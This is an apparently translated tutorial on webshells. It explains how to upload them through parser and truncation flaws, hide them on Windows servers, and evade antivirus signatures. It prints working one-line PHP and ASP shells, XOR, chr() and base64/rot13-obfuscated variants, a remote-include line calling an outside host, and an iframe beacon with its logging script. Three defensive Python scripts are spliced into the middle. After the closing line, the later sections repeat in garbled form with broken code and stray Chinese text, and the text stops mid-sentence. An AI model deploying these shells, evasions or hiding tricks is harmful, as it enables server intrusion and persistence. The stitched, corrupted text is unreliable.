1. What is webshell
- Introduction to webshell
Webshell, as the name suggests: "web" refers to the web server and "shell" is a script written in a scripting language. A webshell is a web-based management tool that gives its user the authority to operate the server; it is also called a webadmin. Webshells are normally used by website administrators for website and server management. However, because a webshell is powerful (it can upload and download files, view databases, and even call system commands on the server, such as creating users or modifying and deleting files), it is also commonly used by attackers. An attacker uses some upload technique to place a self-written webshell in the web server's page directory and then intrudes by accessing that page, or connects to it from a local machine with a client tool for the one-sentence Trojan and operates on the server directly.
- Classification of webshell
```asp
<form action=http://host/path/TEXT.asp method=post>
<textarea name=value cols=120 rows=10 width=45>
<%
set lP=server.createObject("Adodb.Stream")   'Create stream object
lP.Open                                      'Open
lP.Type=2                                    'Text mode
lP.CharSet="gb2312"                          'Character set
lP.writetext request("newvalue")
lP.SaveToFile server.mappath("newmm.asp"),2  'Write the content to newmm.asp; 2 means overwrite
lP.Close                                     'Close the object
set lP=nothing                               'Release the object
response.redirect "newmm.asp"                'Redirect to newmm.asp
%>
</textarea>
<textarea name=newvalue cols=120 rows=10 width=45>(Add content to generate Trojan)</textarea>
<BR><center><br><input type=submit value=submit>
</form>
```
The working mode of the big horse (Da Ma, the full-featured webshell) is much simpler: there is no separation between client and server. Some script authors integrated the server side of the one-sentence Trojan directly into it. The big horse is uploaded through an upload vulnerability and its URL is then accessed directly to perform penetration work on the web server from the page. However, some websites place strict restrictions on uploaded files; because the big horse has many functions it is relatively large and may exceed the upload size limit (its size can be adjusted, for example by copying the code many times or inserting it into a garbled file). The small horse (Xiaoma) is more cumbersome to operate, so the usual approach is to upload the small horse first to obtain a webshell, then upload the big horse through the small horse's connection to get at the server.
2. How to upload webshell
1. Upload parsing vulnerabilities
(1) IIS directory parsing vulnerability
(2) File parsing vulnerability
For example: xx.asp;.jpg. At upload time the name is recognised as a jpg file, but IIS stops parsing the name at the ';' and ignores the characters after it, so the file is parsed as asp. This vulnerability exists in IIS 5.x/6.0.
(3) File name parsing
For example: xx.cer / xx.cdx / xx.asa. Under IIS 6.0, .cer, .cdx and .asa files are treated as executable, and the asp code inside them is executed (.asa is the asp-specific configuration file, .cer is the certificate file).
(4) fast-CGI parsing vulnerability
When the web server turns on fast-CGI, upload the image xx.jpg. The content is:
```php
<?php fputs(fopen('shell.php','w'),'<?php eval($_POST[shell]);?>');?>
```
The fputs call here creates shell.php and writes the one-sentence Trojan into it. Accessing the path xx.jpg/.php then generates shell.php in that directory. This vulnerability exists in IIS 7.0/7.5 and Nginx versions below 8.03. Languages affected: PHP, Perl, Bourne Shell, C and others.
*Note: fast-CGI is an upgraded version of CGI. CGI is an interface that provides human-computer interaction on the server; fast-CGI is a resident CGI. Because CGI must fork a new process for every execution, whereas fast-CGI stays running once started and does not need to fork a process per request, it uses less memory than ordinary CGI.
(5) Apache parsing vulnerability
Apache parses extensions from right to left; if it cannot parse one, it moves one step to the left. Back-end upload checks, however, usually look only at the rightmost suffix of the uploaded file. Accordingly the horse can be named xx.php.rar: Apache cannot parse rar, so it parses the file as php, while the upload check treats it as rar, bypassing the upload suffix restriction.
2. Truncated upload
When uploading a picture, name it for example 1.asp .jpg (with a space after asp). Capture the upload form with NC or Burp Suite and add %00 after the "asp" part of the name (in Burp Suite you can edit the HEX value directly: the HEX value of a space is 20; change 20 to 00). HEX 00 means truncation and 20 means a space. With the truncation, the script's JPG check is ignored and the ASP file is uploaded directly.
3. Back-end database backup
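As an added example (not part of the original article), a server-side upload-name validator in Python that rejects every naming trick described in the parsing and truncation sections above and then stores the file under a server-generated name; the set of allowed image types is an assumption.

```python
import re
import secrets

# Upload-name validator, added as an example for this article (not the author's
# code). It rejects every naming trick the upload section describes: IIS 6
# semicolon truncation (xx.asp;.jpg), IIS-executable extensions (.cer/.cdx/.asa),
# Apache right-to-left double extensions (xx.php.rar), %00 / trailing-space
# truncation (1.asp .jpg) and Windows reserved device names (aux.asp). The
# ALLOWED set is an assumption: the application decides which image types it takes.

ALLOWED = {"jpg", "jpeg", "png", "gif"}
SCRIPT_EXT = {"asp", "aspx", "asa", "cer", "cdx", "php", "php3", "php5", "phtml",
              "jsp", "jspx", "cgi", "pl", "sh"}
RESERVED = ({"con", "prn", "aux", "nul"}
            | {"com%d" % i for i in range(1, 10)}
            | {"lpt%d" % i for i in range(1, 10)})


def check_upload_name(name):
    """Return (ok, reason). ok is True only for a plain <base>.<allowed ext> name."""
    low = name.lower()
    if "\x00" in name or "%00" in low:
        return False, "null-byte truncation"
    if ";" in name:
        return False, "IIS 6 semicolon parsing (xx.asp;.jpg)"
    if "/" in name or "\\" in name or ".." in name:
        return False, "path characters in file name"
    parts = low.split(".")
    if len(parts) < 2 or not parts[0].strip():
        return False, "no extension"
    base, exts = parts[0], parts[1:]
    for ext in exts:
        # Apache walks extensions right to left, so a script extension anywhere
        # in the chain is dangerous; padding (asp + space) is the %00 trick's twin.
        if ext != ext.strip() or ext.strip() in SCRIPT_EXT:
            return False, "script or padded extension '.%s'" % ext
    if len(exts) > 1:
        return False, "multiple extensions"
    if exts[0] not in ALLOWED:
        return False, "extension '.%s' not allowed" % exts[0]
    if base.strip() in RESERVED:
        return False, "reserved device name '%s'" % base
    return True, "ok"


def server_side_name(name):
    """The real mitigation: never store under the client's name. Validate, then
    keep only the (allowed) extension and generate the base name ourselves."""
    ok, reason = check_upload_name(name)
    if not ok:
        raise ValueError(reason)
    ext = name.lower().rsplit(".", 1)[1]
    return "%s.%s" % (secrets.token_hex(16), ext)


# Constructed sample names taken from the cases the article walks through.
SAMPLES = ["photo.jpg", "xx.asp;.jpg", "xx.cer", "xx.php.rar", "1.asp .jpg",
           "aux.jpg", "x.php;x", "logo.PNG"]

if __name__ == "__main__":
    for n in SAMPLES:
        print("%-14r -> %s" % (n, check_upload_name(n)))
```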
Some enterprise back-end management systems have a database backup function (for example, Southern CMS has one). You can upload a picture that contains the one-sentence Trojan, or rename the script to jpg, then use the database backup function to back the picture up as asp or another extension that is parsed as script, after which the Trojan can be executed by accessing it over the web. This method is very old; most CMS have since removed or disabled the backup function.
4. Uploading with database statements
(1) MySQL INTO OUTFILE
The premise of this method is that the website has an injection point, the current database user has permission to write files, and the absolute path of the web root on the server is known. The method uses a UNION query to write the one-sentence Trojan into a PHP file under the website and then connects to it. The conditions are harsh and rarely met.
(2) Writing the Trojan through a new table
Some open-source CMS or self-made webshells have database management functions, including an SQL query function. First use create table shell (code text); to create a table named shell with a column called code of type text. Then use insert into shell(code) values('one-sentence horse'); to assign the one-sentence horse to the code column. Then use the custom backup function to back the table up as x.php;x, which is parsed as php and executed. It is not guaranteed that x.php;x will be parsed as php: different web servers have different service programs and filtering rules, so other methods may be needed.
(3) phpMyAdmin misconfiguration
phpMyAdmin is a tool for managing website databases; config.inc.php is its configuration file. If the parameter $cfg['Servers'][$i]['auth_type'] is left unset (the default is config), no verification is done when logging into the database and you can connect directly. In some versions of MySQL the default login is the root user (the administrator), so the login has maximum authority. However, root can generally only log in locally, so a remote login user must be created; after logging in as that user, create a table and write the one-sentence Trojan into it.
3. The "security" of webshell
1. Regarding the hiding of webshell
When uploading a webshell you must hide it. The first purpose of hiding is to prevent the website administrator from discovering and deleting it; the second is to prevent other attackers from discovering the file and using it.
(1) Hiding the big horse (Da Ma)
① Undead zombie (undeletable file)
Windows has system-reserved device names that it does not allow as folder or file names: aux, prn, con, nul, com1 to com9, lpt1 to lpt9. Files with these names can nevertheless be created with the copy command through a device path, for example:
```bat
c:\>copy 3.asp \\.\C:\aux.asp
```
This creates aux.asp on the C drive. The file cannot be deleted from the graphical interface; to delete it you must use the del command (with the same \\.\ device path). There is no prompt after deletion, but the file is indeed gone. Although this method creates a webshell that cannot be deleted from the graphical interface, if it is placed directly in the web root it will still be deleted once an experienced administrator notices it.
② CLSID hiding
Every program in Windows has a CLSID. If you name a folder x.{program clsid} and create it with two commands (shown as a screenshot in the original), clicking the folder opens the corresponding program, for example the control panel, but in fact it is still a folder and the big horse is still inside it. Naming such a folder with the CLSID of a corresponding program can confuse administrators. For example, enter the recycle bin folder, create a folder with the recycle bin's CLSID, and copy a reserved-name .asp file into it. You can also use
```bat
attrib +h +s +r x.{clsid} /s /d
```
to modify the file attributes and hide it. Windows does not display hidden files by default, and the recycle bin folder is created automatically, so an undeletable webshell can be hidden on the server this way.
③ Driver hiding technology
The principle: in the Windows file system, when a folder is opened the system sends an IRP_MJ_DIRECTORY_CONTROL request. This request allocates a buffer and enumerates the entries under the folder, storing the result in the buffer. A filter driver inspects the enumeration for matching file names, and when a name matches, that folder or file is skipped. As far as I understand the code, it adds the size of the matching entry to the enumeration pointer when it reaches the target, so the target is skipped without being listed. Although there is plenty of C source for this on the Internet, it is hard to get working because of header and system support (file systems differ between Windows versions). I found the Easy File Locker program online; it must be installed on the web server and used to set permissions on the target file.
Permission settings include readable, writable, deletable, and visible.
Once applied, the file is hidden. As mentioned above, because only the directory enumeration is bypassed, the file can still be accessed by its absolute path. My understanding is:
```
c:\WINDOWS\xlkfs.dat
c:\WINDOWS\xlkfs.dll
c:\WINDOWS\xlkfs.ini
c:\WINDOWS\system32\drivers\xlkfs.sys
```
These four files take over the enumeration. Accessing a hidden file by absolute path does not go through the normal lookup but through these four files, which amounts to a separate driver for hidden files.
To avoid being discovered by the administrator you can uninstall the Easy File Locker program, but the four files above must not be deleted. After removing the program, the file can still be accessed by its absolute path, which achieves the hidden backdoor.
④ Registry hiding
Registry path: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL. There is a CheckedValue key under this path; change it to 0. If there is no CheckedValue key, create one and set it to 0. Hidden files will then be completely hidden: even if "Show all files" is enabled in the folder options, they will not be displayed.
(2) Hiding the one-sentence Trojan
① Hiding by header file inclusion
Some script files on the web contain include statements. You can use such an include to pull in the one-sentence file; when the page is accessed, the included sentence is called directly. In asp, use its include directive and fill in the path directly; the file path is the path on the web server.
You can use the Webmaster Stop tool to write the one-sentence small horse into an image as an NTFS stream (the stream is addressed with ':' in the path; once written, the image will no longer display). Then find an asp file on the web server and write an include statement at the beginning of it. The php include statement:
```php
<?php include($include);?>
```
$include here can be an external path, such as:
http://www.aaa.com/1.php?Include=http://www.bbb.com/hehe.php
The content of 1.php on aaa is
```php
<?php include($include);?>
```
which means inclusion. bbb is an external server, on the condition that it must not itself execute PHP; otherwise hehe.php (the one-sentence horse) would run on the bbb server instead of on aaa.
②Configuration file hidden sentence (PHP)
After obtaining the PHP webshell you can use php.ini to hide the file by editing the configuration. One of its functions adds the contents of a given file to every page as a header or footer: auto_prepend_file = hehe.php. Then look at include_path = "E:\PHPnow-1.5.6\htdocs;.". This setting gives the locations from which the header and footer files are loaded; the rule is "path1;path2", meaning the header and footer files in path1 are added to the files in the listed paths, and since '.' here indicates the root path, this is equivalent to adding it to the homepage. Then write the sentence in the hehe.php file, and the prepend function adds the sentence into the website's homepage.
③ 404 small horse
The 404 small horse displays a "page not found" 404 page when accessed, but in fact the Trojan code has already been executed. Generally it can be invoked by pressing Shift five times.
4. Evading detection with the one-sentence webshell
1. Construction method to bypass detection (PHP)
General detection programs filter strings like "_POST", "system" and "call_user_func_array". Construction methods can bypass some of them. The basic principle is that each character in PHP corresponds to a binary value, so one character in the horse can be replaced by the XOR of two other characters. For example:
```php
<?php
@$_++;            // $_ is undefined (null); ++ makes it 1
$__=("#"^"|");    // "_"
$__.=("."^"~");   // "P"
$__.=("/"^"`");   // "O"
$__.=("|"^"/");   // "S"
$__.=("{"^"/");   // "T"
?>
```
The complete one-sentence can then be written as
```php
<?php
@$_++;
$__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/");   // $__ is now "_POST"
@${$__}[!$_](${$__}[$_]);                                // @$_POST[0]($_POST[1])
?>
```
The result is @$_POST[0]($_POST[1]): !$_ is the negation of 1, and since 1 is true in the language, the negation is 0 (false). But this bypass is quite weak. If you think about it, the scanner can evaluate the XOR expression
$__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/")
to its binary value, so the hex form of the string will still be detected and the file killed.
2. Regular expression replacement method (PHP)
PHP has a function preg_replace() that performs regular-expression replacement. Using substitution to bypass the detection system also relies on a feature of the PHP scripting language: when a function is called, if the value passed to its formal parameter contains a command, the command is executed.
```php
<?php
function funfunc($str){}
echo preg_replace("/<title>(.+?)<\/title>/ies",'funfunc("\\1")',$_POST["cmd"]);
?>
```
The code above performs a replacement. First an empty function is created; then preg_replace replaces the <title>...</title> element (the html title) in the cmd form value with funfunc. The value in the POST form is written as
{${phpinfo()}}
(phpinfo() can of course be replaced with other commands). Through the replacement it becomes funfunc({${phpinfo()}}); since ${} evaluates the content inside {}, the phpinfo here executes.
3. Instant generation method (PHP)
When using header file inclusion, the included php header file is easily found by a scanner. Instead, you can use file_put_contents to create a php file with the sentence written into it, generating the horse just before accessing it. However, this function is itself sensitive and easily killed.
4. Avoidance method (asp)
Because some asp servers filter the usual one-sentence form, you can use:
```asp
<script language=VBScript runat=server>execute request("cmd")</script>
```
The function is the same; only the form is changed. Avoiding a specific scripting language: the aspx one-sentence
```aspx
<script language="C#" runat="server">WebAdmin2Y.x.y aaaaa=new WebAdmin2Y.x.y("add6bb58e139be10");</script>
```
Here the one-sentence horse is written in C#.
5. Splitting method (asp)
Split the statement into parts. Although the chance of bypassing is small, it is still a bypass technique: some servers use many sophisticated scanning methods but miss small problems. There is also an enhanced version of the splitting method:
```asp
<%If Request("MH")<>"" Then Execute(Request("MH"))%>
<%if request("MH")<>"" then session("MH")=request("MH"):end if:if session("MH")<>"" then execute session("MH")%>
```
The two lines above use an if statement to separate the pieces. The central idea is to split the sensitive characters: the usual asp signature is eval(request or execute(request, so once split the signature is not detected and the check is bypassed directly.
6. Garbled transformation (ANSI->Unicode encoding)
```asp
<%eval request("#")%>
```
transformed into "┼攠數畣整爠煥敵瑳∨∣┩愾"
```asp
<%eval(eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("brute"))%>
```
The line above uses ASCII encoding: chr(114) is the character numbered 114 in ASCII, i.e. r. The code above converts to
```asp
<%eval(eval(request("brute")))%>
```
7. Anti-virus evasion for the big horse (Da Ma)
(1) base64 encoding
The big horse can be protected by compressing its code, then base64-encoding the compressed output, and finally adding at the end:
```php
<?php @eval(gzinflate(base64_decode($code)));?>
```
to execute the script. The $code variable stores the base64 text; at run time it is decoded, decompressed by gzinflate, and executed by eval. In fact this does not really evade detection: base64_decode and eval are still in the signature list, and the file will still be killed when it passes through the scanner.
(2) ROT13 encoding (php)
str_rot13 is a php encoding function that can be used to encode script code to bypass signature detection. The example shown in the original screenshot (not reproduced) uses strrev to reverse characters, and the characters are deliberately separated with '.' to escape the signature. The three strings encoded with str_rot13 in the screenshot are gzinflate, str_rot13 and base64_decode in order, which is equivalent to triple encoding and avoids the two signatures gzinflate and base64_decode. But str_rot13 itself is not avoided, and some anti-virus software may also use str_rot13 as a signature. ROT13 means "rotate by 13": each character's position in the alphabet is shifted by 13, and applying it twice returns the original value. Because the algorithm is fixed, its strength is low, and decoding is trivial: just apply it once more.
(3) Other encodings
Anti-virus software and scanners generally use signatures to decide whether something is malicious. When doing evasion for the big horse, the small horse or the one-sentence, php or asp encoding functions (such as base64 and rot13) are usually used to bypass scanners. In my opinion you can write your own encoding algorithm and use it to encode the script code to bypass some signatures: borrow ideas from Caesar and shift ciphers, write an algorithm, and encode the script, so that signatures such as base64 and rot13 disappear; or simply use a home-made algorithm to encode the signatures and decode them when used. You can also use keyed algorithms such as DES and RSA. The big horse generally has a password login box; you can tie the login password to the decryption key so the script can only be parsed after the correct password is entered. This both avoids detection by scanners and anti-virus software and is convenient: even if someone else obtains this big horse, they cannot decrypt it and see the source code.
5. About webshell backdoors
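The XOR construction in 4.1, the chr() encoding in 4.6 and the base64/gzinflate/rot13 layering in 4.7 all fold back to plain text without running anything. The following Python de-obfuscator, an added example rather than the author's or any scanner's code, does that folding and then looks for the signatures the article names; the samples are constructed from the fragments quoted above, and only the if-split variant from 4.5 escapes it, which is the gap the article points out.

```python
import base64
import codecs
import re
import zlib

# Static de-obfuscator for the evasion tricks this article lists: XOR-built
# strings, chr() concatenation, and str_rot13/strrev/base64_decode/gzinflate
# layering. Added example for this page, not the author's or any scanner's code.
# It never executes the sample; it folds constant expressions until a plain
# signature (eval, $_POST, execute(request ...) is visible, or is not, which is
# exactly the gap the article describes for the if-split variant.

SIGNATURES = ("eval", "$_post", "$_get", "$_request", "system(", "assert(",
              "execute(request", "execute request", "eval(request", "eval request")

_XOR = re.compile(r'\(\s*"(.)"\s*\^\s*"(.)"\s*\)')           # ("#"^"|") -> "_"
_CONCAT = re.compile(r'"([^"]*)"\s*\.\s*"([^"]*)"')           # "_"."P"  -> "_P"
_CHR = re.compile(r'chr\(\d+\)(?:\s*\+\s*chr\(\d+\))*', re.I)  # chr(114)+chr(101) -> "re"
_LITERAL = re.compile(r"'([^']*)'|\"([^\"]*)\"")
_DECODE = re.compile(r"(str_rot13|strrev|base64_decode|gzinflate)\(\s*(__LIT\d+__)\s*\)", re.I)
_ASSIGN = re.compile(r"\$(\w+)\s*=\s*(__LIT\d+__)\s*;")


def fold_xor(src):
    return _XOR.sub(lambda m: '"%s"' % chr(ord(m.group(1)) ^ ord(m.group(2))), src)


def fold_concat(src):
    prev = None
    while prev != src:
        prev, src = src, _CONCAT.sub(lambda m: '"%s%s"' % (m.group(1), m.group(2)), src)
    return src


def fold_chr(src):
    return _CHR.sub(lambda m: '"%s"' % "".join(chr(int(n)) for n in re.findall(r"\d+", m.group(0))), src)


def _decode(func, text):
    # Intermediate values are latin-1 strings so raw deflate bytes survive intact.
    if func == "str_rot13":
        return codecs.decode(text, "rot_13")
    if func == "strrev":
        return text[::-1]
    if func == "base64_decode":
        return base64.b64decode(text).decode("latin-1")
    return zlib.decompress(text.encode("latin-1"), -15).decode("latin-1")  # gzinflate = raw deflate


def peel(src, max_rounds=50):
    """Tokenise string literals, then repeatedly evaluate any decode call whose
    argument is a known literal, propagating $var = 'literal'; and ${$var}."""
    lits = {}

    def token(value):
        key = "__LIT%d__" % len(lits)
        lits[key] = value
        return key

    src = _LITERAL.sub(lambda m: token(m.group(1) if m.group(1) is not None else m.group(2)), src)
    for _ in range(max_rounds):
        for name, tok in _ASSIGN.findall(src):
            src = re.sub(r"\$" + re.escape(name) + r"(?!\w)", tok, src)
        src = re.sub(r"__LIT\d+__\s*=\s*__LIT\d+__\s*;", "", src)        # drop consumed assignment
        src = re.sub(r"\$\{(__LIT\d+__)\}", lambda m: "$" + lits[m.group(1)], src)
        m = _DECODE.search(src)
        if not m:
            break
        try:
            decoded = _decode(m.group(1).lower(), lits[m.group(2)])
        except (ValueError, zlib.error):
            break
        src = src[:m.start()] + token(decoded) + src[m.end():]
    return re.sub(r"__LIT\d+__", lambda m: '"%s"' % lits[m.group(0)], src)


def deobfuscate(src):
    return peel(fold_chr(fold_concat(fold_xor(src))))


def find_signatures(src):
    low = deobfuscate(src).lower()
    return [s for s in SIGNATURES if s in low]


def _deflate(data):
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    return c.compress(data) + c.flush()


# Constructed samples built from the fragments the article quotes.
PAYLOAD = b"@eval($_POST[shell]);"
_ROT = codecs.encode(_deflate(PAYLOAD).decode("latin-1"), "rot_13").encode("latin-1")
SAMPLES = {
    "xor": '<?php @$_++; $__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/"); @${$__}[!$_](${$__}[$_]); ?>',
    "chr": '<%eval(eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("brute"))%>',
    "gz": "<?php $code='%s'; @eval(gzinflate(base64_decode($code))); ?>" % base64.b64encode(_deflate(PAYLOAD)).decode(),
    "rot": "<?php eval(gzinflate(str_rot13(base64_decode('%s')))); ?>" % base64.b64encode(_ROT).decode(),
    "split": '<%if request("MH")<>"" then session("MH")=request("MH"):end if:if session("MH")<>"" then execute session("MH")%>',
}

if __name__ == "__main__":
    for label, sample in SAMPLES.items():
        print(label, "->", deobfuscate(sample), find_signatures(sample))
```

The empty result for the split variant is the point: string signatures need folding plus a second, behaviour-based check (for example flagging Execute/Eval applied to any session or request value) to cover it.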
Big horses downloaded from the Internet generally contain backdoors, large or small. These backdoors directly cause the website we obtained to be taken over by someone else, so a downloaded big horse must first be checked for backdoors. For example, the universal password here:
```asp
end function
if session("hehe")<>"" then
if request.form("pass")=userpass or request.form("pass")="1111111" then session("hehe")=UserPass
response.redirect url
else
```
Here,
```asp
request.form("pass")=userpass
```
was originally the check on the value of pass: if the entered pass equals userpass, verification succeeds. But the later
```asp
or request.form("pass")="1111111"
```
means that if the entered pass is 1111111 you can also log into the big horse. Of course it is rarely that simple. The original author may assign the userpass value in two places and add a trigger condition for changing userpass that fires when they log in (for example, a failed login triggers an update of the userpass value), so that a suffix gets appended; moreover, the trigger code and the verification code are far apart and hard to find. In that case the big horse's code must be analysed line by line.
Then use the frame to mount the horse:
```html
<iframe src="backdoor address" width=0 height=0></iframe>
```
Here the frame's width and height are set to 0 so it is hidden on the page. The "backdoor address" points to your own receiving script, which is placed on a public server you control. The receiving script is:
```asp
<%
url=Request.ServerVariables("HTTP_Referer")
set fs=server.CreateObject("Scripting.FileSystemObject")
set file=fs.OpenTextFile(server.MapPath("hehe.txt"),8,True)
file.writeline url
file.close
set file=nothing
set fs=nothing
%>
```
where
```asp
url=Request.ServerVariables("HTTP_Referer")
```
takes the Referer of the request, that is, the URL of the big horse, and the URL is then saved to hehe.txt in the current directory.
To remove this kind of backdoor, first disable the second password check in the big horse (the master password) by deleting the relevant code, then check whether the asp big horse page contains a hidden URL such as width=0 height=0, find it and delete it.
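An added Python triage helper (not the author's code) for the two backdoor patterns just described, a hard-coded second password in the login check and a zero-size iframe beacon; the sample shell is constructed from the fragments quoted above and the collector host is a placeholder.

```python
import re

# Triage helper for a captured or downloaded ASP big horse, added as an example
# for this page (not the author's code). It finds the two backdoor patterns
# section 5 describes: a second hard-coded password OR-ed into the login check,
# and a zero-size iframe that leaks the shell's URL (via Referer) to a third
# party. SAMPLE is constructed from the fragments the article quotes; the
# collector host is a placeholder.

SAMPLE = '''
<%
userpass="letmein"
if session("hehe")<>"" then
  if request.form("pass")=userpass or request.form("pass")="1111111" then session("hehe")=UserPass
  response.redirect url
else
%>
<iframe src=http://collector.example/recv.asp width=0 height=0></iframe>
<img src="logo.png" width=0 height=0>
'''

_PASS_CMP = re.compile(r'request\.form\s*\(\s*"pass"\s*\)\s*=\s*("[^"]*"|\w+)', re.I)
_IFRAME = re.compile(r'<iframe\b([^>]*)>', re.I)
_ATTR = re.compile(r'(\w+)\s*=\s*"?([^\s">]+)')


def password_literals(src):
    """String literals the login password is compared against (a legitimate
    check compares against a variable, so any literal is a master password)."""
    return [v.strip('"') for v in _PASS_CMP.findall(src) if v.startswith('"')]


def hidden_iframes(src):
    """src of every iframe rendered with width=0 and height=0."""
    out = []
    for attrs in _IFRAME.findall(src):
        a = {k.lower(): v for k, v in _ATTR.findall(attrs)}
        if a.get("width") == "0" and a.get("height") == "0" and "src" in a:
            out.append(a["src"])
    return out


def triage(src):
    findings = ["hard-coded master password: %s" % p for p in password_literals(src)]
    findings += ["zero-size iframe beacon to: %s" % u for u in hidden_iframes(src)]
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE):
        print(f)
```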
The above has introduced the implementation and hiding of webshells and the related aspects. I hope it will be helpful to friends interested in PHP tutorials.
404 Pony displays a 404 page that does not exist when accessing, but in fact the Trojan code has been executed. Generally, it can be called out by pressing shift 5 times. 4. One sentence about webshell to avoid killing
1. Construction method to bypass detection (PHP)
General detection programs will filter characters like "_POST", "system", "call_user_func_array", this Sometimes you can use construction methods to bypass some detection programs. The basic principle is that each character in PHP corresponds to a binary value. You can use the XOR method to make one character in the horse use the XOR value of two characters. to replace. For example, like the code
Default
@ +$ _ ++
; // Here ++ let '_' 自 1 $ __ = ( "#" ^ "|"
) ;
$__=("/"^"`");
$__= ("|"^"/"); "{"^"/" );
Then the structure and a sentence can be written as
Default
@$_
++;
$__=
("#"^
"|").("." ^"~").("/"^"`"
).("|"^"/").("{"^ "/"); // The value of $__ is _POST @${$__}[!$_](${$__}[$_]); ?> ;
//The result is @$_POST[0]($POST[ 1])!$_ represents the opposite of 1. In the language, 1 represents true, and the converse is 0 (false)But this bypass method is quite weak. If you think about it carefully, even if it is two characters Binary values are "~").("/"^"`").("|"^"/").("{"^"/")1 $__=(
"#"^ "|" ).
("."^"~")
.
("/"^"`" ).("|"^"/"
).("{"^"/"
)
The binary value of
will be detected twice. The value of the hexadecimal code will still be Kill. 2. Regular expression replacement method (PHP) There is a function preg_replace() in php, which can realize the replacement of regular expressions. Using substitution to bypass the detection system also requires a function feature in the PHP scripting language. When the function is called, if the value assigned to the formal parameter in the function contains a command, the command will be executed. Default(.+?)/ies",'funfunc("1")', $_POST["cmd"]);
?>1234
function funfunc
($str){
}
echopreg_replace("/
(.+?) /ies",'funfunc("1")',$_POST
["cmd"
]);
?>
The above code is a process of replacement. First, create an empty function, and then use the preg_replace function to replace the (here is the theme in html) in the form cmd with funfunc. The value in the post form is written as
{${phpinfo()}}
(of course the phpinfo() here can be replaced with other commands), through replacement, it will become Into funfunc({${phpinfo()}})Since ${} can parse the content in {}, the phpinfo here can be executed smoothly. 3. Instant generation method (PHP)
When using header file inclusion, the included header file php is easily scanned by the scanner. At this time, you can use file_put_content to create a file with a sentence like php written in it. . Generate the horse before accessing it, but this function is sensitive and can be easily killed. 4. Avoidance method (asp)
Because some asp servers will filter in order to prevent one-line spam, you can use:
Default
1
scriptlanguage=VBScriptrunat =server> execute request("cmd")/Script>
The functions are the same, Just change the form. Avoid specific script language: aspx one sentence
Default
1
<script>language<span>=<span>"C#"<span><span>runat <span>=<span>"server"<span>><span> WebAdmin2Y<span>.<span>x<span>.<span>y<span><span>aaaaa<span><span>=<span><span>new<span><span>WebAdmin2Y<span>.<span>x<span>.<span>y<span>(<span>"add6bb58e139be10"<span>)<span>; <span></script>
这里使用C#语言写一句话马。5.拆分法(asp)
将拆分为,虽然绕过的可能性很小,但是也是一种绕过手法,也许有的服务器,做了很多高大上的扫描方式,但是遗漏小的问题。还有拆分法加强版:
Default
12
IfRequest("MH")""ThenExecute(Request("MH"))%>
ifrequest("MH")""thensession("MH")=request("MH"):endif:ifsession("MH")""thenexecutesession("MH")%>
以上两句使用了if一句将其分开,中心思想将敏感字符拆分,因为一般asp特征码为eval(request或者execute(request,拆分了之后检测不到特征码,就直接绕过了。6.乱码变形(ANSI->Unicode加密)
Default
1
evalrequest("#")%>变形为“┼攠數畣整爠煥敵瑳∨∣┩愾”
Default
1
eval(eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("brute"))%>
上面一行代码是采用了ascii加密的方法,chr(114)代表的是ascii中的编号为114个那个字符,即r。上述代码转换后的代码为
Default
1
eval(eval(request("brute"))%>
7. Malaysia’s anti-virus protection
(1) base4code encoding
Malaysia’s anti-virus protection can be compressed by compressing the Malaysian code, and then perform the base4 encryption algorithm after compression, and then add the Malaysian code at the end Add
Default
1
@eval(gzinflate (base64_decode($code)));
You can execute the script. Among them, the $code variable is used to store the base4 code. During execution, it is first decompressed by gzinflate and executed in eval. In fact, this cannot be truly protected from killing, as base4code and eval are still included in the signature list, and will also be killed when passing through the scanner. (2) ROT13 encoding (php)
str_rot13 is a function used by php for encoding. It can be used to encode script code to bypass signature detection, for example. file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image031.pngThe strrev function in the picture is used to reverse characters. In order to escape the detection of the signature, the characters are specially separated with '.' signs. The characters encrypted by the three str_rot13 in the picture are gzinflate, str_rot13, base64_decode in order, which is equivalent to triple encryption, and also avoids the two feature codes of gzinflate and base64_decode. But there is no avoiding str_rot13. It is possible that some anti-virus software will also use str_rot13 as a feature code. ROT13 becomes rotation 13, which means that the current character’s position value in the alphabet minus 13 is encrypted. Encrypt it twice and it will return to its original value. However, due to the fixed algorithm, the encryption strength is not strong. And the method of cracking is extremely simple, just encrypt one side. (3) Other encodings
Generally, anti-virus software and scanners will use signature codes to determine whether there are viruses. When doing anti-virus processing for Malaysian or small horses, or in one sentence, php or asp scripts are usually used. Encryption functions can be used to bypass scanners (such as base4, rot13, etc.), but I think you can write your own encryption algorithm, and then use your own encryption algorithm to encrypt script code to bypass some feature codes. You can use some ideas of encryption methods such as Caesar cipher and shift encryption, write an encryption algorithm, and then encrypt the script code. Then feature codes such as base4 and rot3 will disappear, or you can use homemade encryption directly without any trouble. The algorithm encrypts the signature and then decrypts it when used. You can also use key encryption algorithms such as DES and RSA. Generally, Malaysia will have a password login box. You can link the password of the login script with the decryption key, and it can be parsed only after entering the correct password. , on the one hand, it is to avoid detection by scanners and anti-virus software, and on the other hand, it is convenient. Even if this Malaysia is obtained by others, they cannot decrypt it and see the source code. 5. About the backdoor of webshell
Generally, the Malaysian downloaded online will have more or less backdoors. These backdoors directly lead to the website we downloaded being taken away by others, so the Malaysian downloaded online must first Check for backdoors. For example, the universal password here:
Default
1234567
end function
ifsession ( "hehe") ""then
ifrequest.form("pass")=userpassor request.form ("pass")
= "1111111" hThensession ( "hehe" ) = UserPassSS response.redirect urlelse
here
Default
1
request.form ("pass")=userpass
was originally used to verify the value of pass. If the entered pass value is equal to userpass, it means Verification is successful, but later
Default
1
orrequest. from(“pass”)=”1111111”
means if the entered pass value is 111111 1. You can also log in to Malaysia. Of course, this place can't be that simple. The original author can assign the userpass value to two and add one
The trigger condition for userpass change is triggered when he logs in (for example, if the login fails, the update of userpass value will be triggered), so that you can add a suffix, and
